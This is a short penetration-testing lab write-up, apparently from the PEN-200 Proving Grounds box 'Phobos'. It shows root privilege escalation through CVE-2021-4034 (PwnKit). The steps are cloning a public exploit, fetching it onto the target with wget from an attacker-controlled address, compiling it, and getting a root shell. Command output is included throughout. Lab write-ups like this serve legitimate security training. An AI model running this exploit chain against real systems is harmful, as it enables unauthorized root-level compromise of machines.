InfoSec LAB

Phobos_Privilege_Escalation_2

Created: 2 min read

CVE-2021-4034

PEAS has identified that the target system is vulnerable to CVE-2021-4034

A vulnerability, which was classified as critical, has been found in polkit (version now known). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.

Exploit

Exploit located online

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ git clone https://github.com/berdav/CVE-2021-4034 ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Receiving objects: 100% (92/92), 22.71 KiB | 1.33 MiB/s, done.
Resolving deltas: 100% (44/44), done.

Downloading the exploit to Kali

Exploitation

$ wget -q http://192.168.45.218:6006/CVE-2021-4034.tar.gz; tar -xf CVE-2021-4034.tar.gz; cd CVE-2021-4034

Delivery complete

$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Compile

$ ./cve-2021-4034
# whoami
root
# hostname
ubuntu
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:83:3a:8b:3f brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:83ff:fe3a:8b3f/64 scope link 
       valid_lft forever preferred_lft forever
5: vethc812e22@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether b2:18:64:f5:36:86 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::b018:64ff:fef5:3686/64 scope link 
       valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:3d:17 brd ff:ff:ff:ff:ff:ff
    inet 192.168.104.131/24 brd 192.168.104.255 scope global ens192
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks